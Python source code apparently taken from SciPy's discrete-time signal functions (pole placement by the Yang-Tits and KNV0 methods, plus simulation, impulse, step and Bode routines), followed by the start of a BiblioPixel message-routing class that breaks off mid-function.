    m = np.dot(np.dot(np.conj(ker_pole_ij.T), np.dot(u, np.conj(u).T) -
               np.dot(np.conj(u), u.T)), ker_pole_ij)

    # step 3 page 20
    e_val, e_vec = np.linalg.eig(m)
    # sort eigenvalues according to their module
    e_val_idx = np.argsort(np.abs(e_val))
    mu1 = e_vec[:, e_val_idx[-1], np.newaxis]
    mu2 = e_vec[:, e_val_idx[-2], np.newaxis]

    # what follows is a rough python translation of the formulas
    # in section 6.2 page 20 (step 4)

    # remember transfer_matrix_i has been split as
    # transfer_matrix[i]=real(transfer_matrix_i) and
    # transfer_matrix[j]=imag(transfer_matrix_i)
    transfer_matrix_j_mo_transfer_matrix_j = (
        transfer_matrix[:, i, np.newaxis] +
        1j*transfer_matrix[:, j, np.newaxis]
        )

    # Generic case uses only the dominant eigenvector; the degenerate case
    # (two eigenvalues of equal modulus) uses both.
    if not np.allclose(np.abs(e_val[e_val_idx[-1]]),
                       np.abs(e_val[e_val_idx[-2]])):
        ker_pole_mu = np.dot(ker_pole_ij, mu1)
    else:
        mu1_mu2_matrix = np.hstack((mu1, mu2))
        ker_pole_mu = np.dot(ker_pole_ij, mu1_mu2_matrix)
    transfer_matrix_i_j = np.dot(np.dot(ker_pole_mu, np.conj(ker_pole_mu.T)),
                                 transfer_matrix_j_mo_transfer_matrix_j)

    if not np.allclose(transfer_matrix_i_j, 0):
        transfer_matrix_i_j = (transfer_matrix_i_j /
                               np.linalg.norm(transfer_matrix_i_j))
        transfer_matrix[:, i] = np.real(transfer_matrix_i_j[:, 0])
        transfer_matrix[:, j] = np.imag(transfer_matrix_i_j[:, 0])
    else:
        # same idea as in YT_real
        transfer_matrix[:, i] = np.real(ker_pole_mu[:, 0])
        transfer_matrix[:, j] = np.imag(ker_pole_mu[:, 0])
def _YT_loop(ker_pole, transfer_matrix, poles, B, maxiter, rtol):
    """
    Algorithm "YT" Tits, Yang. Globally Convergent
    Algorithms for Robust Pole Assignment by State Feedback
    http://drum.lib.umd.edu/handle/1903/5598

    The poles P have to be sorted accordingly to section 6.2 page 20

    Returns ``(stop, cur_rtol, nb_try)``: whether convergence was reached,
    the relative tolerance achieved on ``det(transfer_matrix)`` and the
    number of iterations performed.
    """
    # The IEEE edition of the YT paper gives useful information on the
    # optimal update order for the real poles in order to minimize the number
    # of times we have to loop over all poles, see page 1442
    nb_real = poles[np.isreal(poles)].shape[0]
    # hnb => Half Nb Real
    hnb = nb_real // 2

    # Stick to the indices in the paper and then remove one to get numpy
    # array index; it is a bit easier to link the code to the paper this way
    # even if it is not very clean. The paper is unclear about what should be
    # done when there is only one real pole => use KNV0 on this real pole
    # seems to work
    if nb_real > 0:
        # update the biggest real pole with the smallest one
        update_order = [[nb_real], [1]]
    else:
        update_order = [[],[]]

    # 1-based indices of the complex poles (pairs start after the reals).
    r_comp = np.arange(nb_real+1, len(poles)+1, 2)
    # step 1.a
    r_p = np.arange(1, hnb+nb_real % 2)
    update_order[0].extend(2*r_p)
    update_order[1].extend(2*r_p+1)
    # step 1.b
    update_order[0].extend(r_comp)
    update_order[1].extend(r_comp+1)
    # step 1.c
    r_p = np.arange(1, hnb+1)
    update_order[0].extend(2*r_p-1)
    update_order[1].extend(2*r_p)
    # step 1.d
    if hnb == 0 and np.isreal(poles[0]):
        update_order[0].append(1)
        update_order[1].append(1)
    update_order[0].extend(r_comp)
    update_order[1].extend(r_comp+1)
    # step 2.a
    r_j = np.arange(2, hnb+nb_real % 2)
    for j in r_j:
        for i in range(1, hnb+1):
            update_order[0].append(i)
            update_order[1].append(i+j)
    # step 2.b
    if hnb == 0 and np.isreal(poles[0]):
        update_order[0].append(1)
        update_order[1].append(1)
    update_order[0].extend(r_comp)
    update_order[1].extend(r_comp+1)
    # step 2.c
    r_j = np.arange(2, hnb+nb_real % 2)
    for j in r_j:
        for i in range(hnb+1, nb_real+1):
            idx_1 = i+j
            if idx_1 > nb_real:
                idx_1 = i+j-nb_real
            update_order[0].append(i)
            update_order[1].append(idx_1)
    # step 2.d
    if hnb == 0 and np.isreal(poles[0]):
        update_order[0].append(1)
        update_order[1].append(1)
    update_order[0].extend(r_comp)
    update_order[1].extend(r_comp+1)
    # step 3.a
    for i in range(1, hnb+1):
        update_order[0].append(i)
        update_order[1].append(i+hnb)
    # step 3.b
    if hnb == 0 and np.isreal(poles[0]):
        update_order[0].append(1)
        update_order[1].append(1)
    update_order[0].extend(r_comp)
    update_order[1].extend(r_comp+1)

    # Convert the 1-based paper indices to 0-based (i, j) pairs.
    update_order = np.array(update_order).T-1
    stop = False
    nb_try = 0
    while nb_try < maxiter and not stop:
        det_transfer_matrixb = np.abs(np.linalg.det(transfer_matrix))
        for i, j in update_order:
            if i == j:
                # Lone real pole: fall back to a KNV0 rank-1 update.
                assert i == 0, "i!=0 for KNV call in YT"
                assert np.isreal(poles[i]), "calling KNV on a complex pole"
                _KNV0(B, ker_pole, transfer_matrix, i, poles)
            else:
                transfer_matrix_not_i_j = np.delete(transfer_matrix, (i, j),
                                                    axis=1)
                # after merge of gh-4249 great speed improvements could be
                # achieved using QR updates instead of full QR in the line
                # below
                # to debug with numpy qr uncomment the line below
                # Q, _ = np.linalg.qr(transfer_matrix_not_i_j, mode="complete")
                Q, _ = s_qr(transfer_matrix_not_i_j, mode="full")

                if np.isreal(poles[i]):
                    assert np.isreal(poles[j]), "mixing real and complex " + \
                        "in YT_real" + str(poles)
                    _YT_real(ker_pole, Q, transfer_matrix, i, j)
                else:
                    assert ~np.isreal(poles[i]), "mixing real and complex " + \
                        "in YT_real" + str(poles)
                    _YT_complex(ker_pole, Q, transfer_matrix, i, j)

        # Clamp the determinant away from zero before computing the
        # relative change.
        det_transfer_matrix = np.max((np.sqrt(np.spacing(1)),
                                      np.abs(np.linalg.det(transfer_matrix))))
        cur_rtol = np.abs(
            (det_transfer_matrix -
             det_transfer_matrixb) /
            det_transfer_matrix)
        if cur_rtol < rtol and det_transfer_matrix > np.sqrt(np.spacing(1)):
            # Convergence test from YT page 21
            stop = True
        nb_try += 1
    return stop, cur_rtol, nb_try
def _KNV0_loop(ker_pole, transfer_matrix, poles, B, maxiter, rtol):
    """
    Loop over all poles one by one and apply KNV method 0 algorithm.

    This wrapper exists because `_YT_loop` needs to call `_KNV0` on a single
    pole without looping over all of them; otherwise `_KNV0` could have been
    inlined here.  Returns ``(stop, cur_rtol, nb_try)``.
    """
    converged = False
    nb_try = 0
    eps = np.sqrt(np.spacing(1))
    while nb_try < maxiter and not converged:
        previous_det = np.abs(np.linalg.det(transfer_matrix))

        for j in range(B.shape[0]):
            _KNV0(B, ker_pole, transfer_matrix, j, poles)

        # Clamp the determinant away from zero before computing the
        # relative change.
        current_det = np.max((eps, np.abs(np.linalg.det(transfer_matrix))))
        cur_rtol = np.abs((current_det - previous_det) / current_det)
        if cur_rtol < rtol and current_det > eps:
            # Convergence test from YT page 21
            converged = True
        nb_try += 1
    return converged, cur_rtol, nb_try
def place_poles(A, B, poles, method="YT", rtol=1e-3, maxiter=30):
    """
    Compute K such that eigenvalues (A - dot(B, K))=poles.

    K is the gain matrix such as the plant described by the linear system
    ``AX+BU`` will have its closed-loop poles, i.e the eigenvalues ``A - B*K``,
    as close as possible to those asked for in poles.

    SISO, MISO and MIMO systems are supported.

    Parameters
    ----------
    A, B : ndarray
        State-space representation of linear system ``AX + BU``.
    poles : array_like
        Desired real poles and/or complex conjugates poles.
        Complex poles are only supported with ``method="YT"`` (default).
    method: {'YT', 'KNV0'}, optional
        Which method to choose to find the gain matrix K. One of:

            - 'YT': Yang Tits
            - 'KNV0': Kautsky, Nichols, Van Dooren update method 0

        See References and Notes for details on the algorithms.
    rtol: float, optional
        After each iteration the determinant of the eigenvectors of
        ``A - B*K`` is compared to its previous value, when the relative
        error between these two values becomes lower than `rtol` the
        algorithm stops.  Default is 1e-3.
    maxiter: int, optional
        Maximum number of iterations to compute the gain matrix.
        Default is 30.

    Returns
    -------
    full_state_feedback : Bunch object
        full_state_feedback is composed of:
            gain_matrix : 1-D ndarray
                The closed loop matrix K such as the eigenvalues of ``A-BK``
                are as close as possible to the requested poles.
            computed_poles : 1-D ndarray
                The poles corresponding to ``A-BK`` sorted as first the real
                poles in increasing order, then the complex conjugates in
                lexicographic order.
            requested_poles : 1-D ndarray
                The poles the algorithm was asked to place sorted as above,
                they may differ from what was achieved.
            X : 2-D ndarray
                The transfer matrix such as ``X * diag(poles) =
                (A - B*K)*X`` (see Notes)
            rtol : float
                The relative tolerance achieved on ``det(X)`` (see Notes).
                `rtol` will be NaN if it is possible to solve the system
                ``diag(poles) = (A - B*K)``, or 0 when the optimization
                algorithms can't do anything i.e when ``B.shape[1] == 1``.
            nb_iter : int
                The number of iterations performed before converging.
                `nb_iter` will be NaN if it is possible to solve the system
                ``diag(poles) = (A - B*K)``, or 0 when the optimization
                algorithms can't do anything i.e when ``B.shape[1] == 1``.

    Notes
    -----
    The Tits and Yang (YT), [2]_ paper is an update of the original Kautsky
    et al. (KNV) paper [1]_. KNV relies on rank-1 updates to find the
    transfer matrix X such that ``X * diag(poles) = (A - B*K)*X``, whereas
    YT uses rank-2 updates. This yields on average more robust solutions
    (see [2]_ pp 21-22), furthermore the YT algorithm supports complex poles
    whereas KNV does not in its original version. Only update method 0
    proposed by KNV has been implemented here, hence the name ``'KNV0'``.

    KNV extended to complex poles is used in Matlab's ``place`` function, YT
    is distributed under a non-free licence by Slicot under the name
    ``robpole``. It is unclear and undocumented how KNV0 has been extended
    to complex poles (Tits and Yang claim on page 14 of their paper that
    their method can not be used to extend KNV to complex poles), therefore
    only YT supports them in this implementation.

    As the solution to the problem of pole placement is not unique for MIMO
    systems, both methods start with a tentative transfer matrix which is
    altered in various way to increase its determinant. Both methods have
    been proven to converge to a stable solution, however depending on the
    way the initial transfer matrix is chosen they will converge to
    different solutions and therefore there is absolutely no guarantee that
    using ``'KNV0'`` will yield results similar to Matlab's or any other
    implementation of these algorithms.

    Using the default method ``'YT'`` should be fine in most cases;
    ``'KNV0'`` is only provided because it is needed by ``'YT'`` in some
    specific cases. Furthermore ``'YT'`` gives on average more robust
    results than ``'KNV0'`` when ``abs(det(X))`` is used as a robustness
    indicator.

    [2]_ is available as a technical report on the following URL:
    http://drum.lib.umd.edu/handle/1903/5598

    References
    ----------
    .. [1] J. Kautsky, N.K. Nichols and P. van Dooren, "Robust pole
        assignment in linear state feedback", International Journal of
        Control, Vol. 41 pp. 1129-1155, 1985.
    .. [2] A.L. Tits and Y. Yang, "Globally convergent algorithms for robust
        pole assignment by state feedback, IEEE Transactions on Automatic
        Control, Vol. 41, pp. 1432-1452, 1996.

    Examples
    --------
    A simple example demonstrating real pole placement using both KNV and YT
    algorithms. This is example number 1 from section 4 of the reference KNV
    publication ([1]_):

    >>> from scipy import signal
    >>> import matplotlib.pyplot as plt

    >>> A = np.array([[ 1.380,  -0.2077,  6.715, -5.676  ],
    ...               [-0.5814, -4.290,   0,      0.6750 ],
    ...               [ 1.067,   4.273,  -6.654,  5.893  ],
    ...               [ 0.0480,  4.273,   1.343, -2.104  ]])
    >>> B = np.array([[ 0,      5.679 ],
    ...               [ 1.136,  1.136 ],
    ...               [ 0,      0,    ],
    ...               [-3.146,  0     ]])
    >>> P = np.array([-0.2, -0.5, -5.0566, -8.6659])

    Now compute K with KNV method 0, with the default YT method and with the
    YT method while forcing 100 iterations of the algorithm and print some
    results after each call.

    >>> fsf1 = signal.place_poles(A, B, P, method='KNV0')
    >>> fsf1.gain_matrix
    array([[ 0.20071427, -0.96665799,  0.24066128, -0.10279785],
           [ 0.50587268,  0.57779091,  0.51795763, -0.41991442]])

    >>> fsf2 = signal.place_poles(A, B, P)  # uses YT method
    >>> fsf2.computed_poles
    array([-8.6659, -5.0566, -0.5   , -0.2   ])

    >>> fsf3 = signal.place_poles(A, B, P, rtol=-1, maxiter=100)
    >>> fsf3.X
    array([[ 0.52072442+0.j, -0.08409372+0.j, -0.56847937+0.j,  0.74823657+0.j],
           [-0.04977751+0.j, -0.80872954+0.j,  0.13566234+0.j, -0.29322906+0.j],
           [-0.82266932+0.j, -0.19168026+0.j, -0.56348322+0.j, -0.43815060+0.j],
           [ 0.22267347+0.j,  0.54967577+0.j, -0.58387806+0.j, -0.40271926+0.j]])

    The absolute value of the determinant of X is a good indicator to check
    the robustness of the results, both ``'KNV0'`` and ``'YT'`` aim at
    maximizing it. Below a comparison of the robustness of the results
    above:

    >>> abs(np.linalg.det(fsf1.X)) < abs(np.linalg.det(fsf2.X))
    True
    >>> abs(np.linalg.det(fsf2.X)) < abs(np.linalg.det(fsf3.X))
    True

    Now a simple example for complex poles:

    >>> A = np.array([[ 0,  7/3.,  0,   0   ],
    ...               [ 0,   0,    0,  7/9. ],
    ...               [ 0,   0,    0,   0   ],
    ...               [ 0,   0,    0,   0   ]])
    >>> B = np.array([[ 0,  0 ],
    ...               [ 0,  0 ],
    ...               [ 1,  0 ],
    ...               [ 0,  1 ]])
    >>> P = np.array([-3, -1, -2-1j, -2+1j]) / 3.
    >>> fsf = signal.place_poles(A, B, P, method='YT')

    We can plot the desired and computed poles in the complex plane:

    >>> t = np.linspace(0, 2*np.pi, 401)
    >>> plt.plot(np.cos(t), np.sin(t), 'k--')  # unit circle
    >>> plt.plot(fsf.requested_poles.real, fsf.requested_poles.imag,
    ...          'wo', label='Desired')
    >>> plt.plot(fsf.computed_poles.real, fsf.computed_poles.imag, 'bx',
    ...          label='Placed')
    >>> plt.grid()
    >>> plt.axis('image')
    >>> plt.axis([-1.1, 1.1, -1.1, 1.1])
    >>> plt.legend(bbox_to_anchor=(1.05, 1), loc=2, numpoints=1)

    """
    # Move away all the inputs checking, it only adds noise to the code
    update_loop, poles = _valid_inputs(A, B, poles, method, rtol, maxiter)

    # The current value of the relative tolerance we achieved
    cur_rtol = 0
    # The number of iterations needed before converging
    nb_iter = 0

    # Step A: QR decomposition of B page 1132 KN
    # to debug with numpy qr uncomment the line below
    # u, z = np.linalg.qr(B, mode="complete")
    u, z = s_qr(B, mode="full")
    rankB = np.linalg.matrix_rank(B)
    u0 = u[:, :rankB]
    u1 = u[:, rankB:]
    z = z[:rankB, :]

    # If we can use the identity matrix as X the solution is obvious
    if B.shape[0] == rankB:
        # if B is square and full rank there is only one solution
        # such as (A+BK)=inv(X)*diag(P)*X with X=eye(A.shape[0])
        # i.e K=inv(B)*(diag(P)-A)
        # if B has as many lines as its rank (but not square) there are many
        # solutions and we can choose one using least squares
        # => use lstsq in both cases.
        # In both cases the transfer matrix X will be eye(A.shape[0]) and I
        # can hardly think of a better one so there is nothing to optimize
        #
        # for complex poles we use the following trick
        #
        # |a -b| has for eigenvalues a+b and a-b
        # |b  a|
        #
        # |a+bi 0| has the obvious eigenvalues a+bi and a-bi
        # |0 a-bi|
        #
        # e.g solving the first one in R gives the solution
        # for the second one in C
        diag_poles = np.zeros(A.shape)
        idx = 0
        while idx < poles.shape[0]:
            p = poles[idx]
            diag_poles[idx, idx] = np.real(p)
            if ~np.isreal(p):
                # complex pole: embed the 2x2 real rotation block
                diag_poles[idx, idx+1] = -np.imag(p)
                diag_poles[idx+1, idx+1] = np.real(p)
                diag_poles[idx+1, idx] = np.imag(p)
                idx += 1  # skip next one
            idx += 1
        gain_matrix = np.linalg.lstsq(B, diag_poles-A, rcond=-1)[0]
        transfer_matrix = np.eye(A.shape[0])
        cur_rtol = np.nan
        nb_iter = np.nan
    else:
        # step A (p1144 KNV) and beginning of step F: decompose
        # dot(U1.T, A-P[i]*I).T and build our set of transfer_matrix vectors
        # in the same loop
        ker_pole = []

        # flag to skip the conjugate of a complex pole
        skip_conjugate = False
        # select orthonormal base ker_pole for each Pole and vectors for
        # transfer_matrix
        for j in range(B.shape[0]):
            if skip_conjugate:
                skip_conjugate = False
                continue
            pole_space_j = np.dot(u1.T, A-poles[j]*np.eye(B.shape[0])).T

            # after QR Q=Q0|Q1
            # only Q0 is used to reconstruct the qr'ed (dot Q, R) matrix.
            # Q1 is orthogonal to Q0 and will be multiplied by the zeros in
            # R when using mode "complete". In default mode Q1 and the zeros
            # in R are not computed

            # To debug with numpy qr uncomment the line below
            # Q, _ = np.linalg.qr(pole_space_j, mode="complete")
            Q, _ = s_qr(pole_space_j, mode="full")

            ker_pole_j = Q[:, pole_space_j.shape[1]:]

            # We want to select one vector in ker_pole_j to build the
            # transfer matrix, however qr returns sometimes vectors with
            # zeros on the same line for each pole and this yields very long
            # convergence times.
            # Or some other times a set of vectors, one with zero imaginary
            # part and one (or several) with imaginary parts. After trying
            # many ways to select the best possible one (eg ditch vectors
            # with zero imaginary part for complex poles) I ended up summing
            # all vectors in ker_pole_j, this solves 100% of the problems and
            # is a valid choice for transfer_matrix.
            # This way for complex poles we are sure to have a non zero
            # imaginary part that way, and the problem of lines full of zeros
            # in transfer_matrix is solved too as when a vector from
            # ker_pole_j has a zero the other one(s) when
            # ker_pole_j.shape[1]>1) for sure won't have a zero there.
            transfer_matrix_j = np.sum(ker_pole_j, axis=1)[:, np.newaxis]
            transfer_matrix_j = (transfer_matrix_j /
                                 np.linalg.norm(transfer_matrix_j))
            if ~np.isreal(poles[j]):  # complex pole
                transfer_matrix_j = np.hstack([np.real(transfer_matrix_j),
                                               np.imag(transfer_matrix_j)])
                ker_pole.extend([ker_pole_j, ker_pole_j])

                # Skip next pole as it is the conjugate
                skip_conjugate = True
            else:  # real pole, nothing to do
                ker_pole.append(ker_pole_j)

            if j == 0:
                transfer_matrix = transfer_matrix_j
            else:
                transfer_matrix = np.hstack((transfer_matrix, transfer_matrix_j))

        if rankB > 1:  # otherwise there is nothing we can optimize
            stop, cur_rtol, nb_iter = update_loop(ker_pole, transfer_matrix,
                                                  poles, B, maxiter, rtol)
            if not stop and rtol > 0:
                # if rtol<=0 the user has probably done that on purpose,
                # don't annoy him
                err_msg = (
                    "Convergence was not reached after maxiter iterations.\n"
                    "You asked for a relative tolerance of %f we got %f" %
                    (rtol, cur_rtol)
                    )
                warnings.warn(err_msg)

        # reconstruct transfer_matrix to match complex conjugate pairs,
        # ie transfer_matrix_j/transfer_matrix_j+1 are
        # Re(Complex_pole), Im(Complex_pole) now and will be Re-Im/Re+Im after
        transfer_matrix = transfer_matrix.astype(complex)
        idx = 0
        while idx < poles.shape[0]-1:
            if ~np.isreal(poles[idx]):
                rel = transfer_matrix[:, idx].copy()
                img = transfer_matrix[:, idx+1]
                # rel will be an array referencing a column of transfer_matrix
                # if we don't copy() it will change after the next line and
                # the line after will not yield the correct value
                transfer_matrix[:, idx] = rel-1j*img
                transfer_matrix[:, idx+1] = rel+1j*img
                idx += 1  # skip next one
            idx += 1

        try:
            m = np.linalg.solve(transfer_matrix.T, np.dot(np.diag(poles),
                                                          transfer_matrix.T)).T
            gain_matrix = np.linalg.solve(z, np.dot(u0.T, m-A))
        except np.linalg.LinAlgError:
            raise ValueError("The poles you've chosen can't be placed. "
                             "Check the controllability matrix and try "
                             "another set of poles")

    # Beware: Kautsky solves A+BK but the usual form is A-BK
    gain_matrix = -gain_matrix
    # K still contains complex with ~=0j imaginary parts, get rid of them
    gain_matrix = np.real(gain_matrix)

    full_state_feedback = Bunch()
    full_state_feedback.gain_matrix = gain_matrix
    full_state_feedback.computed_poles = _order_complex_poles(
        np.linalg.eig(A - np.dot(B, gain_matrix))[0]
        )
    full_state_feedback.requested_poles = poles
    full_state_feedback.X = transfer_matrix
    full_state_feedback.rtol = cur_rtol
    full_state_feedback.nb_iter = nb_iter

    return full_state_feedback
def dlsim(system, u, t=None, x0=None):
    """
    Simulate output of a discrete-time linear system.

    Parameters
    ----------
    system : tuple of array_like or instance of `dlti`
        A tuple describing the system; the number of elements gives the
        interpretation:

            * 1: (instance of `dlti`)
            * 3: (num, den, dt)
            * 4: (zeros, poles, gain, dt)
            * 5: (A, B, C, D, dt)

    u : array_like
        An input array describing the input at each time `t` (interpolation
        is assumed between given times). If there are multiple inputs, then
        each column of the rank-2 array represents an input.
    t : array_like, optional
        The time steps at which the input is defined. If `t` is given, it
        must be the same length as `u`, and the final value in `t`
        determines the number of steps returned in the output.
    x0 : array_like, optional
        The initial conditions on the state vector (zero by default).

    Returns
    -------
    tout : ndarray
        Time values for the output, as a 1-D array.
    yout : ndarray
        System response, as a 1-D array.
    xout : ndarray, optional
        Time-evolution of the state-vector. Only generated if the input is a
        `StateSpace` system.

    See Also
    --------
    lsim, dstep, dimpulse, cont2discrete
    """
    # Normalize the description to a discrete-time dlti system.
    if isinstance(system, lti):
        raise AttributeError('dlsim can only be used with discrete-time dlti '
                             'systems.')
    elif not isinstance(system, dlti):
        system = dlti(*system[:-1], dt=system[-1])

    # Only a StateSpace input gets the state trajectory as a third output.
    is_ss_input = isinstance(system, StateSpace)
    system = system._as_ss()

    u = np.atleast_1d(u)
    if u.ndim == 1:
        u = np.atleast_2d(u).T

    if t is None:
        out_samples = len(u)
        stoptime = (out_samples - 1) * system.dt
    else:
        stoptime = t[-1]
        out_samples = int(np.floor(stoptime / system.dt)) + 1

    # Output buffers: one row per sample.
    xout = np.zeros((out_samples, system.A.shape[0]))
    yout = np.zeros((out_samples, system.C.shape[0]))
    tout = np.linspace(0.0, stoptime, num=out_samples)

    # Initial state.
    if x0 is None:
        xout[0, :] = np.zeros((system.A.shape[1],))
    else:
        xout[0, :] = np.asarray(x0)

    # Resample the input onto the system's time grid when `t` is supplied.
    if t is None:
        u_dt = u
    else:
        if len(u.shape) == 1:
            u = u[:, np.newaxis]
        u_dt = interp1d(t, u.transpose(), copy=False,
                        bounds_error=True)(tout).transpose()

    # March the state one sample at a time: x[k+1] = A x[k] + B u[k],
    # y[k] = C x[k] + D u[k].
    for k in range(out_samples - 1):
        xout[k + 1, :] = (np.dot(system.A, xout[k, :]) +
                          np.dot(system.B, u_dt[k, :]))
        yout[k, :] = (np.dot(system.C, xout[k, :]) +
                      np.dot(system.D, u_dt[k, :]))

    # Final output sample (no further state update needed).
    last = out_samples - 1
    yout[last, :] = (np.dot(system.C, xout[last, :]) +
                     np.dot(system.D, u_dt[last, :]))

    if is_ss_input:
        return tout, yout, xout
    return tout, yout
def dimpulse(system, x0=None, t=None, n=None):
    """
    Impulse response of discrete-time system.

    Parameters
    ----------
    system : tuple of array_like or instance of `dlti`
        A tuple describing the system; the number of elements gives the
        interpretation:

            * 1: (instance of `dlti`)
            * 3: (num, den, dt)
            * 4: (zeros, poles, gain, dt)
            * 5: (A, B, C, D, dt)

    x0 : array_like, optional
        Initial state-vector.  Defaults to zero.
    t : array_like, optional
        Time points.  Computed if not given.
    n : int, optional
        The number of time points to compute (if `t` is not given).

    Returns
    -------
    tout : ndarray
        Time values for the output, as a 1-D array.
    yout : tuple of ndarray
        Impulse response of system.  Each element of the tuple is the
        output of the system for an impulse applied to one input.

    See Also
    --------
    impulse, dstep, dlsim, cont2discrete
    """
    # Normalize the description to a discrete-time state-space system.
    if isinstance(system, dlti):
        system = system._as_ss()
    elif isinstance(system, lti):
        raise AttributeError('dimpulse can only be used with discrete-time '
                             'dlti systems.')
    else:
        system = dlti(*system[:-1], dt=system[-1])._as_ss()

    # Default to 100 samples when neither `t` nor `n` is supplied.
    if n is None:
        n = 100

    if t is None:
        t = np.linspace(0, n * system.dt, n, endpoint=False)
    else:
        t = np.asarray(t)

    # Simulate one unit impulse per input channel.
    yout = None
    for input_idx in range(system.inputs):
        u = np.zeros((t.shape[0], system.inputs))
        u[0, input_idx] = 1.0

        response = dlsim(system, u, t=t, x0=x0)
        tout = response[0]
        if yout is None:
            yout = (response[1],)
        else:
            yout += (response[1],)

    return tout, yout
def dstep(system, x0=None, t=None, n=None):
    """
    Step response of discrete-time system.

    Parameters
    ----------
    system : tuple of array_like
        A tuple describing the system; the number of elements gives the
        interpretation:

            * 1: (instance of `dlti`)
            * 3: (num, den, dt)
            * 4: (zeros, poles, gain, dt)
            * 5: (A, B, C, D, dt)

    x0 : array_like, optional
        Initial state-vector.  Defaults to zero.
    t : array_like, optional
        Time points.  Computed if not given.
    n : int, optional
        The number of time points to compute (if `t` is not given).

    Returns
    -------
    tout : ndarray
        Output time points, as a 1-D array.
    yout : tuple of ndarray
        Step response of system.  Each element of the tuple is the output
        of the system for a unit step applied to one input.

    See Also
    --------
    step, dimpulse, dlsim, cont2discrete
    """
    # Normalize the description to a discrete-time state-space system.
    if isinstance(system, dlti):
        system = system._as_ss()
    elif isinstance(system, lti):
        raise AttributeError('dstep can only be used with discrete-time dlti '
                             'systems.')
    else:
        system = dlti(*system[:-1], dt=system[-1])._as_ss()

    # Default to 100 samples when neither `t` nor `n` is supplied.
    if n is None:
        n = 100

    if t is None:
        t = np.linspace(0, n * system.dt, n, endpoint=False)
    else:
        t = np.asarray(t)

    # Simulate one unit step per input channel.
    yout = None
    for input_idx in range(system.inputs):
        u = np.zeros((t.shape[0], system.inputs))
        u[:, input_idx] = np.ones((t.shape[0],))

        response = dlsim(system, u, t=t, x0=x0)
        tout = response[0]
        if yout is None:
            yout = (response[1],)
        else:
            yout += (response[1],)

    return tout, yout
def dfreqresp(system, w=None, n=10000, whole=False):
    """
    Calculate the frequency response of a discrete-time system.

    Parameters
    ----------
    system : an instance of the `dlti` class or a tuple describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:

            * 1 (instance of `dlti`)
            * 2 (numerator, denominator, dt)
            * 3 (zeros, poles, gain, dt)
            * 4 (A, B, C, D, dt)

    w : array_like, optional
        Array of frequencies (in radians/sample).  Magnitude and phase data
        is calculated for every value in this array.  If not given a
        reasonable set will be calculated.
    n : int, optional
        Number of frequency points to compute if `w` is not given.
    whole : bool, optional
        Normally frequencies are computed from 0 to the Nyquist frequency,
        pi radians/sample (upper-half of unit-circle).  If `whole` is True,
        compute frequencies from 0 to 2*pi radians/sample.

    Returns
    -------
    w : 1D ndarray
        Frequency array [radians/sample]
    H : 1D ndarray
        Array of complex magnitude values

    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``z^2 + 3z + 5`` would be represented as ``[1, 3, 5]``).

    .. versionadded:: 0.18.0
    """
    if not isinstance(system, dlti):
        if isinstance(system, lti):
            raise AttributeError('dfreqresp can only be used with '
                                 'discrete-time systems.')
        system = dlti(*system[:-1], dt=system[-1])

    if isinstance(system, StateSpace):
        # No SS->ZPK conversion exists right now; go SS->TF instead.
        system = system._as_tf()

    if not isinstance(system, (TransferFunction, ZerosPolesGain)):
        raise ValueError('Unknown system type')

    if system.inputs != 1 or system.outputs != 1:
        raise ValueError("dfreqresp requires a SISO (single input, single "
                         "output) system.")

    worN = n if w is None else w

    if isinstance(system, TransferFunction):
        # freqz operates on polynomials in z^-1, so convert from
        # polynomials in z first.
        num, den = TransferFunction._z_to_zinv(system.num.ravel(), system.den)
        return freqz(num, den, worN=worN, whole=whole)

    # ZerosPolesGain case (guaranteed by the isinstance check above).
    return freqz_zpk(system.zeros, system.poles, system.gain, worN=worN,
                     whole=whole)
def dbode(system, w=None, n=100):
    """
    Calculate Bode magnitude and phase data of a discrete-time system.

    Parameters
    ----------
    system : an instance of the LTI class or a tuple describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:

            * 1 (instance of `dlti`)
            * 2 (num, den, dt)
            * 3 (zeros, poles, gain, dt)
            * 4 (A, B, C, D, dt)

    w : array_like, optional
        Array of frequencies (in radians/sample).  Magnitude and phase data
        is calculated for every value in this array.  If not given a
        reasonable set will be calculated.
    n : int, optional
        Number of frequency points to compute if `w` is not given.

    Returns
    -------
    w : 1D ndarray
        Frequency array [rad/time_unit]
    mag : 1D ndarray
        Magnitude array [dB]
    phase : 1D ndarray
        Phase array [deg]

    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``z^2 + 3z + 5`` would be represented as ``[1, 3, 5]``).

    .. versionadded:: 0.18.0
    """
    w, y = dfreqresp(system, w=w, n=n)

    # Recover the sampling time so frequencies can be expressed in
    # rad/time_unit instead of rad/sample.
    dt = system.dt if isinstance(system, dlti) else system[-1]

    magnitude = 20.0 * numpy.log10(abs(y))
    phase = numpy.rad2deg(numpy.unwrap(numpy.angle(y)))
    return w / dt, magnitude, phase
| mit |
ManiacalLabs/BiblioPixel | bibliopixel/control/routing.py | 2 | 2424 | from .. project import construct
from .. util import deprecated, flatten
from . action import ActionList
from . receiver import Receiver
class Routing(Receiver):
    """
    A dict that routes a message to an ActionList.

    The routing table is a (possibly nested) dict whose leaves are
    ActionList instances or objects built by `construct`; `receive`
    walks the table using successive message values as keys.
    """
    def __init__(self, routing, default, python_path):
        """
        :param dict routing: `routing` is a dict that maps addresses
            to lists of actions.
        :param dict default: fallback settings merged into any sub-dict
            that names a type via "typename" or "datatype"; explicit
            entries in the sub-dict win on conflict.
        :param python_path: passed through to `construct.construct_type`
            to resolve type names.

        The values in the input dictionary `routing` are recursively visited
        to build the routing table:

        * values that are strings or lists are used to construct ActionLists
        * dictionaries that contain "typename" or "datatype" keys are
          used to construct a class of that type.
        * otherwise, dictionaries are visited recursively
        * all other types are forbidden
        """
        def make(x):
            # Leaf: a string or list becomes an ActionList.
            if isinstance(x, (list, str)):
                return ActionList(x)
            assert isinstance(x, dict)
            if 'datatype' in x or 'typename' in x:
                # Typed leaf: `default` provides fallbacks, `x` overrides.
                x = dict(default, **x)
                return construct.construct_type(x, python_path)
            # Interior node: recurse into each value.
            return {k: make(v) for k, v in x.items()}
        # Expand dotted keys into nested dicts before building the table.
        routing = flatten.unflatten(routing)
        self.routing = make(routing)
    def set_project(self, project):
        """Set the base project on every entry in the routing table."""
        def visit(x):
            # Try to set_project, then recurse through any values()
            set_project = getattr(x, 'set_project', None)
            if set_project:
                set_project(project)
            values = getattr(x, 'values', lambda: ())
